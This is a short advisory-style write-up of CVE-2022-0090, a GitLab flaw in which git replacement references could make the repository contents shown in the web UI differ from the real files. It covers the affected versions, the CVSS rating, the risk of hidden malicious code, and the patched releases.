CVE-2022-0090: 
GitLab vulnerability analysis and mitigation

An issue was discovered in GitLab affecting versions prior to 14.4.5, between 14.5.0 and 14.5.3, and between 14.6.0 and 14.6.1. The vulnerability allows repository content spoofing using Git replacement references, where GitLab was configured in a way that it doesn't ignore replacement references with git sub-commands, allowing a malicious user to spoof the contents of their commits in the UI (GitLab Security Release).

The vulnerability stems from GitLab's improper handling of git replacement references, a feature supported by the git CLI that allows replacing of git objects. When Gitaly executes git filter-branch and git cat-file to fetch the contents of blob objects, the content of replacement objects would be returned instead of the original blob objects. This creates a discrepancy between rendered contents on GitLab versus the actual file contents when checking out the repository. The vulnerability is rated as medium severity with a CVSS score of 6.5 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N) (GitLab Security Release).

The vulnerability creates a mismatch between the rendered file contents on GitLab and the actual file contents in a repository clone. This could lead to malicious code being hidden in plain sight, potentially resulting in Remote Code Execution (RCE) on unsuspecting users or CI/CD systems. Users reviewing repository contents on GitLab may trust potentially spoofed contents, and systems that rely on downloading source code archives instead of performing a git checkout may execute malicious code (CERT-EU).

The vulnerability has been fixed in GitLab versions 14.6.2, 14.5.3, and 14.4.5 for both Community Edition (CE) and Enterprise Edition (EE). Users are strongly recommended to upgrade to these versions immediately. GitLab.com has already been updated with the patched version (GitLab Security Release).